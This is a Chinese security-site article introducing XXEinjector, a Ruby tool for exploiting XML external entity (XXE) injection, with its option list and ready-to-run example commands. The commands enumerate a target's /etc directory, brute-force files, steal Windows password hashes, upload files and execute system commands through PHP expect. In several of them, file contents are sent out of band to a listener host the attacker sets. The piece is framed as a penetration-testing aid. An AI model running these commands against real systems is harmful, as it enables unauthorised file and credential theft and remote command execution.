injector

injector
登录
注册
XXEinjector：一款功能强大的自动化XXE注射工具 Alpha_h4ck2018-05-07 首发专栏：利器百宝箱关注
今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具，XXEinjector是一款基于Ruby的XXE注入工具，它可以使用多种直接或间接带外方法来检索文件。
1.png

今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具，XXEinjector是一款基于Ruby的XXE注入工具，它可以使用多种直接或间接带外方法来检索文件。其中，目录枚举功能只对Java应用程序有效，而暴力破解攻击需要使用到其他应用程序。

XXEinjector注入工具的使用
XXEinjector本身提供了非常非常丰富的操作选项，所以大家在利用XXEinjector进行渗透测试之前，请自习了解这些配置选项，以最大限度地发挥XXEinjector的功能。当然了，由于XXEinjector是基于Ruby开发的，所以Ruby运行环境就是必须的了。

2.png

--host 必填项– 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file 必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path 必填项-是否需要枚举目录 – 枚举路径。(--path=/etc)
--brute 必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger 记录输出结果。
--rhost 远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport 远程主机的TCP端口信息。(--rport=8080)
--phpfilter 在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc 使用netdoc协议。(Java).
--enumports 枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes 窃取运行当前应用程序用户的Windows哈希。
--expect 使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload 使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt XSLT注入测试。
--ssl 使用SSL。
--proxy 使用代理。(--proxy=127.0.0.1:8080)
--httpport Set自定义HTTP端口。(--httpport=80)
--ftpport 设置自定义FTP端口。(--ftpport=21)
--gopherport 设置自定义gopher端口。(--gopherport=70)
--jarport 设置自定义文件上传端口。(--jarport=1337)
--xsltport 设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test 该模式可用于测试请求的有效。
--urlencode URL编码，默认为URI。
--output 爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout 设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout 设置与服务器断开连接的，防止DoS出现。(--contimeout=20)
--fast 跳过枚举询问，有可能出现结果假阳性。
--verbose 显示verbose信息。
如果你现在还对XXE攻击不是很了解的话，推荐大家先阅读下面这篇文章：《XXE注入攻击-XML外部实体漏洞及样本分析》。

XXEinjector使用样例
枚举HTTPS应用程序中的/etc目录：

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl
使用gopher（OOB方法）枚举/etc目录：

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
二次漏洞利用：

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt
使用HTTP带外方法和netdoc协议对文件进行爆破攻击：

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc
通过直接性漏洞利用方式进行资源枚举：

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
枚举未过滤的端口：

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
窃取Windows哈希：

ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes
使用Java jar上传文件：

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf
使用PHP expect执行系统指令：

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls
测试XSLT注入：

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt
记录请求信息：

ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt
XXEinjector下载地址：
XXEinjector-master.zip

* 参考来源：darknet，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM

专栏
Alpha_h4ck
Alpha_h4ck
602 篇文章
等级： 10级
关注
||
发表评论已有 1 条评论

死宅10086 (7级) 2018-05-08回复 1楼
没玩过。。。

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
相关推荐
Juicy Potato本地特权提升工具（RottenPotatoNG加强版）
Juicy Potato本地特权提升工具（RottenPotatoNG加强版）
RottenPotatoNG及其变体利用了基于在127.0.0.1:6666上具有MiTM侦听器的BITS服务，以及当你拥有SeImpersonate或SeAssignPrimaryToken权限时的特权提升链。

secist2018-08-20184238
bn-kallsyms：一款用于从prockallsyms导入符号到内核二进制文件的Binary Ninja插件
bn-kallsyms：一款用于从prockallsyms导入符号到内核二进制文件的Binary Ninja插件
今天给大家介绍一款名叫kallsyms的工具，它其实是一个Binary Ninja插件，它可以从prockallsyms导入符号到内核二进制代码中。

Alpha_h4ck2018-07-04272962
LIEF：用于解析和修改 ELF, PE 和MachO 格式的跨平台库
LIEF：用于解析和修改 ELF, PE 和MachO 格式的跨平台库
今天给大家介绍的是一款名叫LIEF的跨平台库，大家可利用LIEF来对ELF、PE和MachO格式的文件进行解析和修改。

Alpha_h4ck2018-06-21974641
SpookFlare：一款用于绕过各种安全措施的工具
SpookFlare：一款用于绕过各种安全措施的工具
SpookFlare是一款可帮助你有机会绕过各种安全措施的工具，例如客户端检测和网络端检测的端点策略。

injector

文章评论